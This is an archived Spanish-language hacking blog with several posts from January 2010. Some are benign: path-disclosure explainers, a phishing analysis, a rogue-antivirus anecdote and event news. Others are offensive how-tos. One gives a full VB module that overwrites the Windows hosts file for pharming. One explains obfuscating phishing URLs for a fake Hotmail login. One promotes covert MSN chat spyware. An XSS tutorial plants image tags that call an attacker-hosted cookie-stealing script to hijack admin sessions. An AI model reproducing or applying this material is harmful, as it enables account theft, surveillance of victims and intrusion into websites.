domingo 31 de enero de 2010

Partial Function Disclosure --> New Term

El PFD consiste en que tras introducir valores malformados podamos obtener errores de los cuales extraer la ruta y parcialmente algunas funciones usadas por la web. Cómo podemos observar el concepto es parecido al del FPD (Full Path Disclosure) y su explotación será casi la misma que el FPD pero la diferencia radica en que a la hora de explotar el bug se mostraran algunas de las funciones que son usadas por la aplicación web como se muestra a continuación en la figura.




Como vemos el bug lo estamos explotando asiendo a la variable query= en un array como se muestra en la imagen (query[]= ) lo cual aparte de mostrarnos la ruta con lo cual vendría a ser un FPD (Full Path Disclosure). Aparte se mostrarían algunas de las funciones que usa la web y la línea de código en la cual están siendo usadas lo cual vendría a ser el PFD (Partial Function Disclosure) que es el tema de este paper.


Algunos tendrán la pregunta diciendo de que sirve poder ver algunas de la funciones usadas en la aplicación web pues bueno todo nos podría ser útil para saber a que tipo de filtros pro ejemplo nos estamos enfrenta y a la vez nos vamos asiendo una idea de cómo esta programa la aplicación web y que tipo de seguridad se esta empleando.


Bueno con esto termino esta explicación de PFD (Partial Function Disclosure)
PFD (Partial Function Disclosure) escrito y Termino inventado por Jordan Alexander Diaz Diaz (jdiaz@aqpgrid.com)


---------------------------------


Bueno he decidido compartir esta entrada para que den su opinion de este tema, mi opinion humilde y personal es:


me es una idea original el buscar nuevos nombres pero es según yo es lo mismo que un FPD, yo no soy un experto asi que les dejo a su análisis...

además si alguien me puede mostrar una web con FPD que no me muestre función me gustaría verla...



Saludos
Dr.White

sábado 30 de enero de 2010

Programando: MySql y PHP

ya que xianur0 me ha mostrado un bonito sistema de resaltado de código hoy he dedicido hacer un pequeño tuto de programación en PHP.

MYSQL y PHP...

La primera parte es declarar 4 variables... el USUARIO, PASS, HOST y BASE de DATOS


$dbhost = 'localhost'; //host normalmente localhost
$dbuser = 'root'; //usuario
$dbpass = 'password'; //contraseña
$dbname = 'users'; //nombre de la base de datos



Bueno como ven ahí hemos asignado a variables mediante las cuales haremos la conexion a la base de datos...

usando la función mysql_connect() haremos la conexión..

de la siguiente manera:


$conexion = mysql_connect($dbhost, $dbuser, $dbpass) or die ('No hay Conexion con el host');



Ahí hemos hecho la conexión y a la vez hemos dicho or die que quiere decir o si muere (si no conecte) mostramos el mensaje que dice ahí...

Ahora les voy a decir como seleccionar una Base de Datos a usar...


mysql_select_db($dbname) or die(mysql_error());



En el anterior code se ve que hacemos conexion o en el caso que no se pueda hacer la conexion entonces nos mostrará el error exacto... ahora les voy a decir como hacer una consulta...


$codigo = "123";
$column = "name";
$query="select $column from usuarios WHERE codigo=$codigo";
$recep = mysql_query($query);


bueno pues con eso ya hemos hecho la consulta, ahora solo haría falta hacerle un echo y pues nos mostraría el nombre de la persona que tenga el code 123... ahora entonces concatenemos todo el code y hagamos que muestre...




$dbhost = 'localhost'; //host normalmente localhost
$dbuser = 'root'; //usuario
$dbpass = 'password'; //contraseña
$dbname = 'users'; //nombre de la base de datos

$conexion = mysql_connect($dbhost, $dbuser, $dbpass) or die ('No hay Conexion con el host');
mysql_select_db($dbname) or die(mysql_error());

$codigo = "123";
$column = "name";
$query="select $column from usuarios WHERE codigo=$codigo";
$recep = mysql_query($query);

echo $recep;





Espero les haya gustado este mini tuto de conexiones MySql, despues avanzaremos con otro tuto de CURL() como lo prometí antes...

PD: El sistema comenzará a servir despues...

Saludos
Dr.White

Inteto de Hackeo de MSN

Bueno debo admitir que es una "buena" técnica de phishing la que han usado pero que mejor que ustedes mismos la vean, debo disculparme a su vez por estar escribiendo tan poco en el blog lo que pasa es que ando con muchos trámites por mi colegio, pero bueno ahora si primero una previa...


Bueno el Phishing Trata de que han intentado usar muchas veces mi pregunta secreta y para atacar por el lado psicológico el mail me lo envian con Advertencia 1, advertencia 2 y asi cosa que te confunden :p mm bueno algo asi se veia el mail:





mmm bueno luego si entramos vemos algo como:





Bueno la cosa es que ustedes si lo ven o por lo menos una persona que ve el mail lo puede creer ya que es recibido de:

Windows Live Hotmail (member-services@live.es)


y como ven en la anterior imagen pues dice algo creible y el link se ve bastante creible pero vamos a ver algo:





Eso es lo que muestra la barra del mozilla firefox cuando pongo mi mouse sobre el link... (es la barra donde dice: Esperando, Terminado, Cargando, etc, la barra inferior).


Bueno la cosa es que ahora si ya sabemos que no es del dominio de MSN que nos llega... asi que vamos a verle el código fuente al mensaje a ver que podemos ver...


Bueno como yo no marque como seguro el mensaje no se podía ver la imagen en donde muestro el mensaje pero igual les muestro la URL de la Imagen:



<p><img src="http://img46.imageshack.us/img46/2883/windowslivet.png" width="175" height="23" /></p>



Miren eso... como se dan cuenta dudo mucho que hotmail use las imagenes en imageshack... quien quiera que haya hecho esto ya cometió su primer error... ahora mas código "extraño"


<a href="http://mailive.es/default/am9zZW56dEBob3RtYWlsLmNvbQ.html">http://mail.live.com/ppsecure/?u=am9zZW56dEBob3RtYWlsLmNvbQ==&p;=aHR0cDovL3d3dy5hcHBsZS5jb20vZXMvaXBob25lLw==&id;=MTcxNjQ4&lng;=es&n;=amFqYSBwYXJlY2Uga2Ugc29zIHZpdm8gZWg/IDpQIGJ1ZW5vIHNhbHVkb3MgYSB0dSBzZfFvcmEgOlA=&x;=aXBob25l</a>



ahí está la parte clave... nos muestran un link y nos lleva a otro... y que si damos click veamos que hace nuestro navegador:





Bueno he intentado acceder al sitio pero ni con proxy puedo acceder al parecer se los han bajado o algo por el estilo, igual que mejor ejemplo que este para que vean como son algunos que te atacan no solo con el phishing sino también por el lado psicológico dandote algunas cosas como Advertencia 1 y usar contadores para saber cuantas te van enviando...


Creo que esto también les puede servir de ayuda para sus presentaciones aquellos que quieren mostrar temas como este... espero les sirva la entrada ;)


Saludos
Dr.White

jueves 28 de enero de 2010

Superando el 3er Reto de Perverths0 - Http Hacking

Bueno el Perverths0 hizo los retos de DragonJAR mi team fue el team negro y fue el ganador, la próxima semana los retos serán hechos por nosotros, los pondré aquí también por si alguno de ustedes lo quería resolver...


Básicamente los retos fueron http hacking... Cambiar una cabecera cambiar el method y bueno los dos últimos eran Saber Programar y algo de Ingeniería Inversa...


La tool que usé fue BurpSuite V1.3 pero ustedes pueden usar una variante que prefieran, vean el Video y comprenderán...


Resolver reto Número 3 de DragonJAR V1 from SeguridadBlanca on Vimeo.




Bueno espero les sirva ;)


PD: Como se que si ven solo el Tercero se Perderan les dejo el link de los retos igual...

http://96.31.90.70/retodragonjar/retodragonjar/


esos son los retos ;) diviertanse si lo quieren pasar y la web no es peligrosa osea es parte de los retos...


Saludos
Dr.White

lunes 25 de enero de 2010

X25 Ethical Hacking Conferences




"X.25 Ethical Hacking Conferences"

Uno de los principales eventos en Latinoamérica relacionado con la seguridad informática.

El "X.25 Ethical Hacking Conferences" permitirá reunir a investigadores reconocidos a nivel nacional y mundial quienes compartirán las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.

Este evento se dividirá en dos etapas: los talleres de Especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de Conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus últimas investigaciones y experiencias en el área.

Las Conferencias y los talleres de Seguridad Informática se llevarán a cabo del

23 y 24 de Octubre del 2010

Sede: Xalapa, Ver. México

Si quieres mas información entra directamente a la web dando click aquí


Saludos
Dedalo

domingo 24 de enero de 2010

MK-Portal Bugged FPD

Bueno la comunidad hispabyte, excelente comunidad tenía como portal MkPortal, haciendo unos tests pude sacarle un FPD, ya está reparado pero de todas maneras les dejo el video de como muchas veces hay software conocido con el que podemos sacar rutas locales del servidor, esto puede servir a la hora de una auditoría en el caso que a nivel web no encontremos errores críticos, no se olviden siempre de poner los display errors en off y pues filtren este tipo de bugs...


aca les dejo un videito que hice...


Full Path Disclosure from SeguridadBlanca on Vimeo.

[Pentesting] Full Path Disclosure By Zero Bits



.



0x01. Introducción

Bueno, me les presento, algunos ya me deben conocer, pero igual a los que no. Estoy en la RED bajo el seudónimo de Zero Bits, pero mi nombre real es DAVID, tengo 15 años, recién cumplidos el 21 de este MES XD (Octubre), soy Venezolano y ahorita ando sin team jejeje.



En este mini-tutorial, MEJORADO de la versión anterior, les hablare un poco sobre una vulnerabilidad muy vista, pero no muy peligrosa, llamada: Full Path Disclosure.



Continuemos…




0x02. ¿Qué es Full Path Disclosure o FPD? – ¿Por que se produce? – ¿Como saber si es vulnerable?




Como dije arriba, esta vulnerabilidad muy vista, pero no muy peligrosa, sirve más que todo para ingeniar otros ataques como LFI. ya que por eso mismo (no es muy peligrosa), muchos administradores no le hacen caso y no las tapan.



Esta vulnerabilidad, se produce más que todo por la mala programación de variables, agregándole cualquier cosa innecesaria y por eso no tiene ningún tipo validación de protección.



Para saber si un servidor es vulnerable, tendríamos que agregar en cualquier link con una estructura como esta; http://localhost/fpd.php?var=test cualquier arreglo que se nos ocurra: http://localhost/fpd.php?var=aaaaaaaaahggg. Sabemos que es vulnerable, si el servidor nos tira algo como esto (ejemplo real):




[QUOTE]

Fatal error: Call to undefined function sql_query() in E:\www\webvulnerable\includes\cargar_config.php on line 15[/QUOTE]




Esta era una web que andaba testeando (no les diré el link, para que no nos regañen, pero los bugs ya fueron reportados) junto con un amigo, y pude notar que tenia los directorios abiertos y podía viajar por los archivos del servidor, al estar en el directorio “/includes/” pude ver el archivo llamado “cargar_config.php”, me metí y no era necesario agregar un arreglo, ya que estaba el error hay.



Otra cosa, al poner un ARREGLO cualquiera, no solo nos tirara, un “FATAL ERROR”, también nos podría tirar otros error como los de SQL Injection como los “warnings”. Muchos han podido notar que al agregar un ' en un servidor vulnerable, nos tira un ERROR SQL y un directorio completo donde se encuentra el fichero vulnerable, eso es también es FULL PATH DISCLOSURE.



0x04. Alguna forma de aprovecharse



Podemos notar, un directorio completo:




[QUOTE]

E:\www\webvulnerable\includes\cargar_config.php[/QUOTE]




Imaginemos que la estructura del archivo vulnerable era de este tipo, y se encontraba en la parte física de la pagina: “http://localhost/fpd.php?var=”. Como dije arriba, FPD (Full Path Disclosure) es una vulnerabilidad, que muestra el PATH (Directorio), completo a donde se encuentra el error, y esta nos sirve nada mas como una HERRAMIENTA de AYUDA para construir otros ataques.



Por ejemplo, podemos (claro, si la web es vulnerable), realizar un ataque LFI:



http://localhost/fpd.php?var=../




Ya que tendríamos todo un path, ya tendríamos una mejor idea, de cómo realizar un ataque LFI claro.

Una forma buena, es realizar un LOAD_FILE, con el método SQL Injection.



Otros métodos buenos, son que a la hora de mostrar un PATH, nos tire directorios buenos como (admin, PANEL DE ADMINISTRACION, includes, scripts, entre otros peligrosos), y ver si están abierto, para sacar mucha mas info.

Este método, es muy fácil, no tiene mucha ciencia, pero puede que en algunos casos nos sirva.





0x05. Parchando.




Este bug, es fácil de reparar, ya que en la mayoría de los casos, se debe a la flojera de un administrador, si no es un “sistema web” y es un servidor web normal, podríamos tener un código vulnerable diferente a los otros, por eso podemos analizarlo y ver donde esta nuestro error.




Una forma fácil, es modificando el archivo “.htaccess” y poner los códigos “display_errors” en OFF para que no nos muestre error webs:



display_errors = Off



0x05. Conclusion




Al llegar al final de este tutorial, podemos ver como un simple bug, puede llegar a ser una buena herramienta para crear otro tipo de ataques, por eso es mejor mantenerte al tanto de nuevos bugs y taparlos hay mismo, ya que por la flojera o la confianza tuya, podemos tener intruso en nuestros servidores. Ten en cuenta esto:



No existe código 100% seguro





Autor: Zero Bits


Fecha: 23/10/09

viernes 22 de enero de 2010

Cuando Nos ataca un Rogue Software

Hace un Tiempo Un Amigo mio me dijo que su Anti Virus no le detectaba ningun Virus pero a cada rato le saltaban ventanas de un antivirus como de Windows que decía que tenía muchos troyanos...


Pues Decidí hacer un pequeño análisis de lo que era y pues di con esto...


Era Rogue Software, Aquí les dejo unas capturas de pantalla del Software que infectó la PC de mi amigo...











Como pueden observar se ven como advertencias reales sin embargo no lo sen si prestamos atención a la primera imagen en el título del programa dice PC Live Guard, ahora con ayuda de nuestro queridísimo google busquemos:

PC Live Guard


Primer Resultado



Ahora como se dan cuenta en el primer resultado encontramos un breve resumen de que es el PC Live Guard y un tutorial de Eliminación.


El tutorial que yo vi para la eliminación y seguí fue este


Espero les sirva esta anecdota para cuando les pase algo parecido en la PC, esto le pasó a el por hacer una busqueda como esta asi que tengan cuidado que google también puede ser un arma letal de aquellos que quieren infectar internautas...


Victima de la infección y agradecimientos por las imagenes: Maurizio Spechel.


Saludos
Dr.White

jueves 21 de enero de 2010

Denial Of Service a www.elhacker.net

Diosdelared desde siempre ha sido un lugar de donde salen bugs, exploits, tutos, etc y hoy vi lo que sinceramente veia bien difícil, un VIDEO en el que se le hace un DENIAL of Service a ElHacker.Net sin mas que decirles pues...


VIDEO:






Blog del Creador del Video



Link directo



Bueno pues el video lo dice todo...



Saludos
Dr.White

miércoles 20 de enero de 2010

Prohide Msn Live Logger - Espía Conversaciones

Nuestro Compatriota Prohide otra de nuevo ha hecho de las suyas, ha creado un programa muy bueno, con este programa podemos básicamente ver conversaciones de MSN, El funcionamiento es muy simple todos aquellos que alguna ves manejaron un Troyano o Keylogger se les hará parecido el funcionamiento.


el programa tiene un aspecto como este:



Lo que hace básicamente el programa es obtener las conversaciones de MSN de una PC "Infectada" con esto, esto te puede servir para observar las conversaciones de la gente de la empresa a la que se le otorga MSN, para ver un mas detallado funcionamiento den click aquí.


La Desventaja de este programa si lo queremos hacer sin que la "víctima" se entere debemos tener acceso físico a la computadora sin embargo PROHIDE nos ofrece una Versión PAGADA del Software con el cual podemos hacerlo sin que se de cuenta la víctima, no lo detecta ningun Antivirus asi que no tendrán problema.


Referencia

Web de Prohide




Saludos
Dr.White

lunes 18 de enero de 2010

BeEF Xss t00l

Jbyte hace unos dias me mostró esta t00l ya que tenía tiempo sin visitar pentester y no le tome mucha importancia por que pensé que era un simple botnet pero era mas que eso, esta t00l es una especie de botnet que a la ves te permite atacar a tu victima por Ejecución de Código JavaScript; esta t00l se llama BeEF como les dije permite atacar a travéz de código JavaScript, es una t00l que te facilita la inyección y ejecución de este tipo de código aun lo estoy probando pero está muy interesante, te facilita el uso de este tipo de ataques...



aquí un pequeño Gráfico de su uso, está bien explicado...





Tiene una interfaz que hace fácil el uso, se las muestro a continuación:




Los de Pentester dan una mejor explicación de su funcionamiento que yo me limito a no determinar ya que lo he usado solo un rato apenas llevo dos horas con el programita... y pues me gustaría que lo prueben conmigo ya que al parecer está bueno...


Click aquí para ver en pentester


lo interesante de esta t00l es que te permite seleccionar un par de módulos con los cuales podamos hacer explotación de software local de la pc que atacamos, overflows, ejecución de código remoto y este tipo de ataques...



Aqui les presento unas cuantas diapositivas donde se muestra un poco del uso de este software...






Saludos
Dr.White

jueves 14 de enero de 2010

BackTrack 4 Release - a Descargar!




Como muchos saben durante meses en http://www.remote-exploit.org/backtrack.html se podian ver actualizaciones del Sistema Operativo y en si las descargas dando un par de clicks... desde hace unos dias desde esa web ya no se actualizará lo que es backtrack sino que lo haran desde un nuevo dominio http://www.backtrack-linux.org/ en ese dominio podemos encontrar la descarga de lo que es backtrack 4 ahora si ya podremos testear a full... tuve la oportunidad de enterarme rápido y la Imagen ISO ya está en un pendrive... ahora en la web no solo van a poder encontrar la ISO para un Live CD y la version para VMWARE


bueno yo no les cuento mas solo den click aquí y vean todo lo nuevo que hay hacerca de backtrack, no se olviden cualquier duda a la comunidad hispana de backtrack.



Suscribanse al Blog :) pronto comenzaré a escribir a diario de nuevo.

Saludos
Dr.White

lunes 11 de enero de 2010

Análisis - Phishing de MSN


Hoy quiero tratar de dar unas pautas del motivo por el cual es tan fácil engañar gente para que nos de su clave de msn con phishing...


En primera, vamos a hacer la comparación con como se ve facebook un login...


facebook:

http://www.facebook.com/login.php


Hotmail:

http://login.live.com/login.srf?wa=wsignin1.0&rpsnv;=11&ct;=1263246246&rver;=6.0.5285.0℘=MBI&wreply;=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc;=3082&id;=64855&mkt;=es-es


Análisis de los login... el de Hotmail pues como nos damos cuenta está en un subdominio, nos da variables cualquieras, tiene una especie de variable que llama al sitio http://mail.live.com/default.aspx o convoca por algún motivo o algo.


Gracias a Esto podríamos usar una técnica conocida como URL OBFUSCATION, ahora les voy a dar un ejemplo de como podriamos hacer eso

digamos que nos compramos el dominio liives.com o compramos loginlive-account.com algo por el estilo ahora vamos a ponerle un sub-dominio a nuestro dominio comprado


http://msn.loginlive-account.com

ahora subimos nuestro SCAM

http://msn.loginlive-account.com/windows/msn/messenger/connect/index.php

OFUSCADA:

http%3A%2F%2Fmsn%2Eloginlive%2Daccount%2Ecom%2Fwindows%2Fmsn%2Fmessenger%2Fconnect%2Findex%2Ephp

Otra opción:

http://0/wind%6fw%73/ms%6e/mes%73eng%65r/%63o%6ene%63t/i%6e%64ex.%70%68%70


Como ofuscamos:

http://www.keyone.co.uk/tools-url-encoder.asp


o sino:

http://funkyfilters.com/url/obfuscation/



Eso en cuestion al Login...


Ahora las actualizaciones de imagenes, por ejemplo yo siempre ando probando las nuevas cosas que me entero que salen entonces por ahí, en mi msn tengo mucha gente y por ahí escucho nuevo SCAM de Facebook entonces yo digo mm ¿nuevo? lo que pasa es que Facebook en muchas ocaciones cambia el lugar donde hostea sus imágenes, lo hacia mas seguido antes pero ahora no tanto, esto es como una medida de seguridad...


Otro aspecto que hace tan vulnerable a hotmail son las páginas del tipo www.quienteadmite.com en esta página se supone que se da el servicio de ver quien te tiene bloqueado, la gente no conocedora del tema se logguea y ve quienes le han dado a no admitir y pues gracias a esto muchos tienen sus messengers pero otros también entran.

este ha sido un pequeño análisis de por que es tan común robar cuentas de msn...


Saludos
Dr.White

viernes 8 de enero de 2010

Hosts Poisoning T00l

Antes que todo quería pedir disculpas por escribir tan poco pero ando en época de examenes y pues no tengo tiempo de escribir pero ahora le quiero dar unos minutitos al blog para enseñarles esta t00l tan curiosa que he encontrado...


Dando Vueltas por blogs de malware y troyanos en general, lógico solo para mantenerme actualizado, di con que en Professional Hacker han puesto un módulo con el cual se puede hacer hosts poisoning, que quiero decir con hosts poisoning, ya hemos hablado antes sobre el pharming y esto es pharming, lo que hacemos es modificar el archivo /etc/hosts para que crean que al entrar en una página está todo bien sin embargo están navegando en un fake pero en el browser dice que están en la página real...


Esta técnica se usa para la estafa, la mayoría de veces para robo de cuentas bancarias, esta técnica como antes mencionado se llama pharming, ahora si, aquí podemos ver el ejemplo de un programa que usa lo mas común que es un bat pero lo que les voy a presentar es un módulo que he estado analizando y al parecer funciona a la perfección, lo digo por que los batch para hacer esta función en windows 7 y vista no funcionan bien, por eso el módulo que les daré es tan importante, tiene para hacerlo a windows 7 y windows vista.


el módulo solo te facilita el poder escribir ek módulo pero te da la opción de que hagas un programita con mas funciones...


El Code:


'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''' HOSTS POISONING MODULE BY XA0S '''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Creado por Xa0s '
' www.professional-hacker.org '
' Modulo encargado de editar el archivo Hosts de Windows '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Public Function hosts(insertar As String, windows As String) As String
Dim w2 As String
If windows = 95 Then
w2 = "C:\Windows\hosts"
Else
If windows = 98 Then
w2 = "C:\Windows\hosts"
Else
If windows = "Me" Then
w2 = "C:\Windows\hosts"
Else
If windows = "NT" Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = 2000 Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = "XP" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = 2003 Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "Vista" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "7" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
MsgBox "Error de Sistema Operativo", vbCritical, "Hosts Poisoning Module By Xa0s"
Exit Function
End If
End If
End If
End If
End If
End If
End If
End If
End If
Open w2 For Output As #1
Print #1, "// Hosts Poisoning Module By Xa0s //"
Print #1, insertar
Close #1
End Function

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''' MODO DE USO ''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' call hosts(AQUI LO QUE QUIERAS ESCRIBIR EN EL HOSTS, SISTEMA OPERATIVO) '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' El sistema operativo puede ser: '
'--- 95, 98, ME, 2000, NT, 2003, XP, VISTA, 7 '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''



en el mismo código se especifica mucho...


espero esto les sirva por que yo se los doy con esta idea pero ustedes pueden usarlo para escribir otros archivos, uno nunca sabe algo como esto le pueda servir.


PD: el código no se ve todo pero solo hagan copy paste de lo que se supone está y luego peguenlo en un bloc de notas o en el ide de visual y ya, les saldrá el código mas grande que es el real.

Saludos
Dr.White

lunes 4 de enero de 2010

Herramientas Que Facilitan Nuestro Trabajo - SB te los da, no lo pidas a los reyes magos ;)

A la larga todo lo que yo les he enseñado o recordado estoy seguro queles ha servido por lo menos de algo, pero así como hacemos las cosas manuales también hay herramientas que nos facilitan las cosas, durante el año 2009 hablé de algunas de ellas pero aquí les voy a dar una lista de las que yo les recomiendo...


SqlBFT00ls



UDP Flooder



IRS Scanner de Servicios Activos



Rainbow Tables Cracker



Ip-T00ls



Brutus AE



AirCrack Windows



AirCrack Linux



Win Arp Watch



RPVS



Shadow Security Scanner



Nessus



h-edit



Acunetix Web Vuñnerability Scanner



las herramientas que no encuentren aquí pueden buscarlas en google pero estas son de las mejores que no he mensionado...


Espero les sirvan estas herramientas...


Saludos
Dr.White

domingo 3 de enero de 2010

Procedimiento, Cuando un Xss se vuelve crítico.

Empezando este año con una entrada que creo que les ayudará a ver desde otra perspectiva un xss, en esta ocación les voy a enseñar como explotar un Xss para poder entrar...


Hace un tiempo escribí sobre como se hace para robar cookies con un xss y para los que se orientan con mi blog pues han de creer que yo enseñe robando masomenos con ingeniería social pero nosotros podemos hacer mas que eso... ahora les mostraré lo que podemos hacer...


mm el código que usaremos es el stándar por asi decirlo que tenemos en la otra entrada pero lo vamos a complementar con otras cosas... ahora si, hay muchas maneras de como poder entrar como administrador a una web con un xss o xsrf y la primera es robandole la cookie al administrador o moderador con ingeniería social + un Foro Vulnerable...


Asi como hago yo ustedes cuando quieran ver si una app es vulnerable procuren descargarlo y buscar código con errores, en casi todas las entradas pongo ejemplos de como se ve un código con error, o si quieren busquen el bug en exploit-db y ver si existe un xss o csrf a explotar... ahora si a la acción...


Tenemos nuestro Bug un Perfecto Xss para robar cookies está ubicado en el en el bbcode [img][/img] el problema con esto es que podemos poner cualquier tipo de imagen es decir jpg jpeg gif pero... php? mmm como podemos ver pregunté si se podía php, el php no es un tipo de imagen pero aun así los programadores cometieron ese error ahora a explotarlo, vamos a escribir una entrada, digamos en un foro de "hackers"...


Tema: Nuevo 0day :o
Content:

[img=http://miwebhostingparahackear.com/robocookie.php][/img]

Bueno amigos.................


EOF
------------------------


Listo como vemos acabamos de "ejecutar" nuestro código de robo de cookies y hemos comenzado a robar cookies y lógico lo que esté escrito en el post debe ser convincente luego vamos a ver quienes han caido... no puede ser... tenemos 20 sessiones que nervios... probemos a ver si alguna es del administrador, ahora despues de probar 13 sessiones:

Welcome Admin


Listo ya teniendo la administración podemos subir una shell como theme, etc pero bueno ahora les voy a mostrar otra situación... hace unos días un amigo me comentó de un 0day muy curioso... era en un chat php...


despues de analizar durante mucho rato el chat por que el no me quería decir del bug se me ocurrió ver los headers usando nuestro live http headers, y en el chat dijeron algo chistoso y yo use el emoticon "xD" y en eso vi que en uno de los headers post de los mensajes se veia algo como esto...



<img src="http://www.webserver.com/chat/files/emoticon10.jpg></img>


cuando lo vi dije no puede ser no creo que ese sea el bug...

cambie


<img src="http://www.webserver.com/chat/files/emoticon10.jpg></img>


por

test123...

y posteo eso intento lo primero con una redirección pero no aceptaba todos los tags entonces probe poner:



<img src="http://www.miwebhackeatodo.com/robo.php></img>


salio una [x] en ves de imagen y mientras escribian en el chat yo me iva sacando todas las cookies... como se dan cuenta hay veces que los errores son pura investigación y curiosidad... lo único que hice fue probar un poco y salio, ustedes también pueden hacer esto...


yo hoy les he enseñando esto con la etiqueta img pero se puede con un iframe, hipervínculo de flash y todo lo que ustedes se imaginen...


espero les sirva este tuto...


Saludos
Dr.White